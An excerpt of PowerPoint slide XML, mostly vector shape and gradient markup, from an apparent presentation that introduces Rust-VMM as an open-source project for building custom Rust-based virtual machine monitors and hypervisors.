                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="78" y="220"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="208" y="10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45715" tIns="22857" rIns="45715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/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="6" name="Freeform 81">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C92FB55-7DB7-BC48-92BE-EF212D9718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95550" y="-317500"/>
                <a:ext cx="4398963" cy="6629400"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 628 w 1385"/>
                  <a:gd name="T1" fmla="*/ 1263 h 2088"/>
                  <a:gd name="T2" fmla="*/ 673 w 1385"/>
                  <a:gd name="T3" fmla="*/ 1683 h 2088"/>
                  <a:gd name="T4" fmla="*/ 626 w 1385"/>
                  <a:gd name="T5" fmla="*/ 1900 h 2088"/>
                  <a:gd name="T6" fmla="*/ 538 w 1385"/>
                  <a:gd name="T7" fmla="*/ 2036 h 2088"/>
                  <a:gd name="T8" fmla="*/ 804 w 1385"/>
                  <a:gd name="T9" fmla="*/ 2036 h 2088"/>
                  <a:gd name="T10" fmla="*/ 914 w 1385"/>
                  <a:gd name="T11" fmla="*/ 1924 h 2088"/>
                  <a:gd name="T12" fmla="*/ 886 w 1385"/>
                  <a:gd name="T13" fmla="*/ 1755 h 2088"/>
                  <a:gd name="T14" fmla="*/ 918 w 1385"/>
                  <a:gd name="T15" fmla="*/ 1405 h 2088"/>
                  <a:gd name="T16" fmla="*/ 966 w 1385"/>
                  <a:gd name="T17" fmla="*/ 1747 h 2088"/>
                  <a:gd name="T18" fmla="*/ 966 w 1385"/>
                  <a:gd name="T19" fmla="*/ 1957 h 2088"/>
                  <a:gd name="T20" fmla="*/ 994 w 1385"/>
                  <a:gd name="T21" fmla="*/ 2061 h 2088"/>
                  <a:gd name="T22" fmla="*/ 1197 w 1385"/>
                  <a:gd name="T23" fmla="*/ 1957 h 2088"/>
                  <a:gd name="T24" fmla="*/ 1189 w 1385"/>
                  <a:gd name="T25" fmla="*/ 1653 h 2088"/>
                  <a:gd name="T26" fmla="*/ 1208 w 1385"/>
                  <a:gd name="T27" fmla="*/ 1069 h 2088"/>
                  <a:gd name="T28" fmla="*/ 1179 w 1385"/>
                  <a:gd name="T29" fmla="*/ 697 h 2088"/>
                  <a:gd name="T30" fmla="*/ 1234 w 1385"/>
                  <a:gd name="T31" fmla="*/ 941 h 2088"/>
                  <a:gd name="T32" fmla="*/ 1234 w 1385"/>
                  <a:gd name="T33" fmla="*/ 1144 h 2088"/>
                  <a:gd name="T34" fmla="*/ 1233 w 1385"/>
                  <a:gd name="T35" fmla="*/ 1298 h 2088"/>
                  <a:gd name="T36" fmla="*/ 1252 w 1385"/>
                  <a:gd name="T37" fmla="*/ 1316 h 2088"/>
                  <a:gd name="T38" fmla="*/ 1227 w 1385"/>
                  <a:gd name="T39" fmla="*/ 1438 h 2088"/>
                  <a:gd name="T40" fmla="*/ 1331 w 1385"/>
                  <a:gd name="T41" fmla="*/ 1366 h 2088"/>
                  <a:gd name="T42" fmla="*/ 1356 w 1385"/>
                  <a:gd name="T43" fmla="*/ 1048 h 2088"/>
                  <a:gd name="T44" fmla="*/ 1160 w 1385"/>
                  <a:gd name="T45" fmla="*/ 483 h 2088"/>
                  <a:gd name="T46" fmla="*/ 538 w 1385"/>
                  <a:gd name="T47" fmla="*/ 448 h 2088"/>
                  <a:gd name="T48" fmla="*/ 271 w 1385"/>
                  <a:gd name="T49" fmla="*/ 237 h 2088"/>
                  <a:gd name="T50" fmla="*/ 115 w 1385"/>
                  <a:gd name="T51" fmla="*/ 27 h 2088"/>
                  <a:gd name="T52" fmla="*/ 71 w 1385"/>
                  <a:gd name="T53" fmla="*/ 118 h 2088"/>
                  <a:gd name="T54" fmla="*/ 1 w 1385"/>
                  <a:gd name="T55" fmla="*/ 212 h 2088"/>
                  <a:gd name="T56" fmla="*/ 128 w 1385"/>
                  <a:gd name="T57" fmla="*/ 334 h 2088"/>
                  <a:gd name="T58" fmla="*/ 484 w 1385"/>
                  <a:gd name="T59" fmla="*/ 608 h 2088"/>
                  <a:gd name="T60" fmla="*/ 663 w 1385"/>
                  <a:gd name="T61" fmla="*/ 875 h 2088"/>
                  <a:gd name="T62" fmla="*/ 628 w 1385"/>
                  <a:gd name="T63" fmla="*/ 1263 h 2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85" h="2088">
                    <a:moveTo>
                      <a:pt x="628" y="1263"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="628" y="1263"/>
                      <a:pt x="613" y="1495"/>
                      <a:pt x="673" y="1683"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="734" y="1870"/>
                      <a:pt x="722" y="1879"/>
                      <a:pt x="626" y="1900"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="531" y="1922"/>
                      <a:pt x="508" y="2031"/>
                      <a:pt x="538" y="2036"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="568" y="2041"/>
                      <a:pt x="710" y="2059"/>
                      <a:pt x="804" y="2036"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="898" y="2013"/>
                      <a:pt x="929" y="1999"/>
                      <a:pt x="914" y="1924"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="899" y="1849"/>
                      <a:pt x="866" y="1911"/>
                      <a:pt x="886" y="1755"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="906" y="1599"/>
                      <a:pt x="930" y="1509"/>
                      <a:pt x="918" y="1405"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="938" y="1500"/>
                      <a:pt x="936" y="1680"/>
                      <a:pt x="966" y="1747"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="996" y="1813"/>
                      <a:pt x="1010" y="1927"/>
                      <a:pt x="966" y="1957"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="923" y="1988"/>
                      <a:pt x="908" y="2061"/>
                      <a:pt x="994" y="2061"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1080" y="2061"/>
                      <a:pt x="1254" y="2088"/>
                      <a:pt x="1197" y="1957"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1140" y="1827"/>
                      <a:pt x="1164" y="1792"/>
                      <a:pt x="1189" y="1653"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1214" y="1514"/>
                      <a:pt x="1246" y="1280"/>
                      <a:pt x="1208" y="1069"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1170" y="858"/>
                      <a:pt x="1164" y="734"/>
                      <a:pt x="1179" y="697"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1224" y="796"/>
                      <a:pt x="1217" y="854"/>
                      <a:pt x="1234" y="941"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1251" y="1028"/>
                      <a:pt x="1246" y="1112"/>
                      <a:pt x="1234" y="1144"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1222" y="1176"/>
                      <a:pt x="1221" y="1261"/>
                      <a:pt x="1233" y="1298"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1240" y="1314"/>
                      <a:pt x="1252" y="1316"/>
                      <a:pt x="1252" y="1316"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1252" y="1316"/>
                      <a:pt x="1212" y="1405"/>
                      <a:pt x="1227" y="1438"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1242" y="1470"/>
                      <a:pt x="1292" y="1497"/>
                      <a:pt x="1331" y="1366"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1370" y="1234"/>
                      <a:pt x="1376" y="1168"/>
                      <a:pt x="1356" y="1048"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1336" y="927"/>
                      <a:pt x="1385" y="512"/>
                      <a:pt x="1160" y="483"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="934" y="454"/>
                      <a:pt x="762" y="518"/>
                      <a:pt x="538" y="448"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="315" y="378"/>
                      <a:pt x="293" y="339"/>
                      <a:pt x="271" y="237"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="248" y="136"/>
                      <a:pt x="166" y="54"/>
                      <a:pt x="115" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="0"/>
                      <a:pt x="10" y="43"/>
                      <a:pt x="71" y="118"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="134"/>
                      <a:pt x="0" y="141"/>
                      <a:pt x="1" y="212"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="282"/>
                      <a:pt x="59" y="291"/>
                      <a:pt x="128" y="334"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="196" y="377"/>
                      <a:pt x="238" y="510"/>
                      <a:pt x="484" y="608"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="590" y="649"/>
                      <a:pt x="667" y="666"/>
                      <a:pt x="663" y="875"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="660" y="1083"/>
                      <a:pt x="629" y="1145"/>
                      <a:pt x="628" y="126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1E1E1">
                      <a:shade val="67500"/>
                      <a:satMod val="115000"/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="E1E1E1">
                      <a:shade val="100000"/>
                      <a:satMod val="115000"/>
                    </a:srgbClr>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="10200000" scaled="0"/>
                <a:tileRect/>
              </a:gradFill>
              <a:ln>
                <a:noFill/>
              </a:ln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7" name="Freeform 82">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A95E92B6-F4A2-E94D-BA09-5049200A99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38662" y="3800475"/>
                <a:ext cx="911225" cy="1819275"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 243 w 287"/>
                  <a:gd name="T1" fmla="*/ 458 h 573"/>
                  <a:gd name="T2" fmla="*/ 275 w 287"/>
                  <a:gd name="T3" fmla="*/ 108 h 573"/>
                  <a:gd name="T4" fmla="*/ 275 w 287"/>
                  <a:gd name="T5" fmla="*/ 108 h 573"/>
                  <a:gd name="T6" fmla="*/ 202 w 287"/>
                  <a:gd name="T7" fmla="*/ 72 h 573"/>
                  <a:gd name="T8" fmla="*/ 0 w 287"/>
                  <a:gd name="T9" fmla="*/ 254 h 573"/>
                  <a:gd name="T10" fmla="*/ 30 w 287"/>
                  <a:gd name="T11" fmla="*/ 386 h 573"/>
                  <a:gd name="T12" fmla="*/ 66 w 287"/>
                  <a:gd name="T13" fmla="*/ 522 h 573"/>
                  <a:gd name="T14" fmla="*/ 244 w 287"/>
                  <a:gd name="T15" fmla="*/ 573 h 573"/>
                  <a:gd name="T16" fmla="*/ 243 w 287"/>
                  <a:gd name="T17" fmla="*/ 458 h 5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7" h="573">
                    <a:moveTo>
                      <a:pt x="243" y="458"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="263" y="302"/>
                      <a:pt x="287" y="212"/>
                      <a:pt x="275" y="108"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="275" y="108"/>
                      <a:pt x="275" y="108"/>
                      <a:pt x="275" y="108"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="262" y="46"/>
                      <a:pt x="222" y="0"/>
                      <a:pt x="202" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="187" y="126"/>
                      <a:pt x="93" y="240"/>
                      <a:pt x="0" y="254"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="298"/>
                      <a:pt x="17" y="343"/>
                      <a:pt x="30" y="386"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="51" y="449"/>
                      <a:pt x="63" y="492"/>
                      <a:pt x="66" y="522"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="110" y="544"/>
                      <a:pt x="178" y="572"/>
                      <a:pt x="244" y="573"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="236" y="560"/>
                      <a:pt x="233" y="537"/>
                      <a:pt x="243" y="45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777777">
                      <a:alpha val="47000"/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="0">
                    <a:schemeClr val="bg1">
                      <a:alpha val="0"/>
                      <a:lumMod val="0"/>
                    </a:schemeClr>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="6600000" scaled="0"/>
              </a:gradFill>
              <a:ln>
                <a:noFill/>
              </a:ln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" name="Freeform 83">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0F6492E-F136-024E-A372-1089590610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95550" y="73025"/>
                <a:ext cx="504825" cy="596900"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 130 w 159"/>
                  <a:gd name="T1" fmla="*/ 65 h 188"/>
                  <a:gd name="T2" fmla="*/ 72 w 159"/>
                  <a:gd name="T3" fmla="*/ 0 h 188"/>
                  <a:gd name="T4" fmla="*/ 1 w 159"/>
                  <a:gd name="T5" fmla="*/ 89 h 188"/>
                  <a:gd name="T6" fmla="*/ 87 w 159"/>
                  <a:gd name="T7" fmla="*/ 188 h 188"/>
                  <a:gd name="T8" fmla="*/ 130 w 159"/>
                  <a:gd name="T9" fmla="*/ 65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9" h="188">
                    <a:moveTo>
                      <a:pt x="130" y="65"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="51"/>
                      <a:pt x="86" y="21"/>
                      <a:pt x="72" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="13"/>
                      <a:pt x="0" y="26"/>
                      <a:pt x="1" y="89"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="145"/>
                      <a:pt x="38" y="162"/>
                      <a:pt x="87" y="188"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="148" y="162"/>
                      <a:pt x="159" y="82"/>
                      <a:pt x="130" y="65"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:gradFill>
                <a:gsLst>
                  <a:gs pos="0">
                    <a:srgbClr val="E1E1E1">
                      <a:shade val="30000"/>
                      <a:satMod val="115000"/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="50000">
                    <a:srgbClr val="E1E1E1">
                      <a:shade val="67500"/>
                      <a:satMod val="115000"/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="E1E1E1">
                      <a:shade val="100000"/>
                      <a:satMod val="115000"/>
                    </a:srgbClr>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="9000000" scaled="0"/>
              </a:gradFill>
              <a:ln>
                <a:noFill/>
              </a:ln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" name="Freeform 84">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A63168A1-1F1F-BB46-A699-D01BA6CE17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40361" y="4041774"/>
                <a:ext cx="939801" cy="1749425"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 257 w 296"/>
                  <a:gd name="T1" fmla="*/ 551 h 551"/>
                  <a:gd name="T2" fmla="*/ 262 w 296"/>
                  <a:gd name="T3" fmla="*/ 280 h 551"/>
                  <a:gd name="T4" fmla="*/ 296 w 296"/>
                  <a:gd name="T5" fmla="*/ 0 h 551"/>
                  <a:gd name="T6" fmla="*/ 0 w 296"/>
                  <a:gd name="T7" fmla="*/ 95 h 551"/>
                  <a:gd name="T8" fmla="*/ 39 w 296"/>
                  <a:gd name="T9" fmla="*/ 374 h 551"/>
                  <a:gd name="T10" fmla="*/ 65 w 296"/>
                  <a:gd name="T11" fmla="*/ 531 h 551"/>
                  <a:gd name="T12" fmla="*/ 257 w 296"/>
                  <a:gd name="T13" fmla="*/ 551 h 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6" h="551">
                    <a:moveTo>
                      <a:pt x="257" y="551"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="218" y="447"/>
                      <a:pt x="239" y="406"/>
                      <a:pt x="262" y="280"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="275" y="207"/>
                      <a:pt x="290" y="108"/>
                      <a:pt x="296" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="277" y="35"/>
                      <a:pt x="201" y="139"/>
                      <a:pt x="0" y="95"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="192"/>
                      <a:pt x="15" y="319"/>
                      <a:pt x="39" y="374"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="418"/>
                      <a:pt x="72" y="483"/>
                      <a:pt x="65" y="531"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="107" y="526"/>
                      <a:pt x="179" y="523"/>
                      <a:pt x="257" y="551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777777">
                      <a:alpha val="47000"/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="0">
                    <a:schemeClr val="bg1">
                      <a:alpha val="0"/>
                      <a:lumMod val="0"/>
                    </a:schemeClr>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="6600000" scaled="0"/>
              </a:gradFill>
              <a:ln>
                <a:noFill/>
              </a:ln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" name="Oval 85">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9A210C9-0DF7-4649-AF6F-B05758D78B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841406">
                <a:off x="16559213" y="-2009775"/>
                <a:ext cx="3336925" cy="3336925"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:gradFill flip="none" rotWithShape="1">
                <a:gsLst>
                  <a:gs pos="0">
                    <a:srgbClr val="E1E1E1">
                      <a:shade val="30000"/>
                      <a:satMod val="115000"/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="50000">
                    <a:srgbClr val="E1E1E1">
                      <a:shade val="67500"/>
                      <a:satMod val="115000"/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="E1E1E1">
                      <a:shade val="100000"/>
                      <a:satMod val="115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</p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Овал 48">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49FCAFB5-646A-EE42-95DB-8421AB4994DA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="18473947" y="3731010"/>
              <a:ext cx="2030411" cy="1845829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2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B380837-AA90-234A-A14D-04C90404A069}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="690386" y="1916449"/>
            <a:ext cx="865615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Want</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" alt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get</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" alt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safer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" alt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b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>faster</a:t>
            </a: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endParaRPr lang="en-US" sz="4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4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Rust-VMM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4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0073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58440D62-483E-8D40-AD4E-56010F212E53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we love Rust-VMM?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42BC40-3F3F-A94C-AA3B-46264C23F4E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="718846" y="1838139"/>
            <a:ext cx="7915488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2800" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>ust-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>VMM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> is an open-source project that empowers the community to build </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>custom </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Virtual Machine Monitors (VMMs) and hypervisors.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>It</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>abstracts the common virtualization components which implements a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>Rust-based </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>VMM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-CN" sz="28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824DAAB-9318-F842-976F-6C6EA574627D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9248931" y="2771518"/>
            <a:ext cx="1783624" cy="3465966"/>
            <a:chOff x="8769151" y="2320289"/>
            <a:chExt cx="1993580" cy="3783945"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Freeform 896">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B819270E-869A-6C40-B94B-41900AC88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5127" y="5174416"/>
              <a:ext cx="865152" cy="329756"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 117 w 117"/>
                <a:gd name="T1" fmla="*/ 39 h 46"/>
                <a:gd name="T2" fmla="*/ 117 w 117"/>
                <a:gd name="T3" fmla="*/ 28 h 46"/>
                <a:gd name="T4" fmla="*/ 89 w 117"/>
                <a:gd name="T5" fmla="*/ 13 h 46"/>
                <a:gd name="T6" fmla="*/ 51 w 117"/>
                <a:gd name="T7" fmla="*/ 28 h 46"/>
                <a:gd name="T8" fmla="*/ 6 w 117"/>
                <a:gd name="T9" fmla="*/ 7 h 46"/>
                <a:gd name="T10" fmla="*/ 1 w 117"/>
                <a:gd name="T11" fmla="*/ 0 h 46"/>
                <a:gd name="T12" fmla="*/ 1 w 117"/>
                <a:gd name="T13" fmla="*/ 12 h 46"/>
                <a:gd name="T14" fmla="*/ 0 w 117"/>
                <a:gd name="T15" fmla="*/ 23 h 46"/>
                <a:gd name="T16" fmla="*/ 58 w 117"/>
                <a:gd name="T17" fmla="*/ 46 h 46"/>
                <a:gd name="T18" fmla="*/ 59 w 117"/>
                <a:gd name="T19" fmla="*/ 45 h 46"/>
                <a:gd name="T20" fmla="*/ 59 w 117"/>
                <a:gd name="T21" fmla="*/ 46 h 46"/>
                <a:gd name="T22" fmla="*/ 70 w 117"/>
                <a:gd name="T23" fmla="*/ 46 h 46"/>
                <a:gd name="T24" fmla="*/ 117 w 117"/>
                <a:gd name="T25" fmla="*/ 3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46">
                  <a:moveTo>
                    <a:pt x="117" y="39"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="117" y="35"/>
                    <a:pt x="117" y="31"/>
                    <a:pt x="117" y="28"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="105" y="27"/>
                    <a:pt x="96" y="21"/>
                    <a:pt x="89" y="13"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="79" y="23"/>
                    <a:pt x="66" y="28"/>
                    <a:pt x="51" y="28"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="28"/>
                    <a:pt x="19" y="21"/>
                    <a:pt x="6" y="7"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="4"/>
                    <a:pt x="3" y="2"/>
                    <a:pt x="1" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="5"/>
                    <a:pt x="1" y="9"/>
                    <a:pt x="1" y="12"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="15"/>
                    <a:pt x="0" y="19"/>
                    <a:pt x="0" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="36"/>
                    <a:pt x="34" y="44"/>
                    <a:pt x="58" y="46"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="45"/>
                    <a:pt x="58" y="45"/>
                    <a:pt x="59" y="45"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="59" y="45"/>
                    <a:pt x="59" y="45"/>
                    <a:pt x="59" y="46"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="46"/>
                    <a:pt x="66" y="46"/>
                    <a:pt x="70" y="46"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="85" y="46"/>
                    <a:pt x="101" y="43"/>
                    <a:pt x="117" y="39"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="BDC3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5" tIns="22857" rIns="45715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" name="Freeform 894">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{952F86EE-6511-DD45-A59B-A22B35872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8325" y="3506335"/>
              <a:ext cx="1441921" cy="745536"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 32 w 195"/>
                <a:gd name="T1" fmla="*/ 67 h 104"/>
                <a:gd name="T2" fmla="*/ 44 w 195"/>
                <a:gd name="T3" fmla="*/ 49 h 104"/>
                <a:gd name="T4" fmla="*/ 93 w 195"/>
                <a:gd name="T5" fmla="*/ 27 h 104"/>
                <a:gd name="T6" fmla="*/ 125 w 195"/>
                <a:gd name="T7" fmla="*/ 36 h 104"/>
                <a:gd name="T8" fmla="*/ 126 w 195"/>
                <a:gd name="T9" fmla="*/ 30 h 104"/>
                <a:gd name="T10" fmla="*/ 170 w 195"/>
                <a:gd name="T11" fmla="*/ 30 h 104"/>
                <a:gd name="T12" fmla="*/ 165 w 195"/>
                <a:gd name="T13" fmla="*/ 66 h 104"/>
                <a:gd name="T14" fmla="*/ 195 w 195"/>
                <a:gd name="T15" fmla="*/ 90 h 104"/>
                <a:gd name="T16" fmla="*/ 195 w 195"/>
                <a:gd name="T17" fmla="*/ 85 h 104"/>
                <a:gd name="T18" fmla="*/ 168 w 195"/>
                <a:gd name="T19" fmla="*/ 24 h 104"/>
                <a:gd name="T20" fmla="*/ 102 w 195"/>
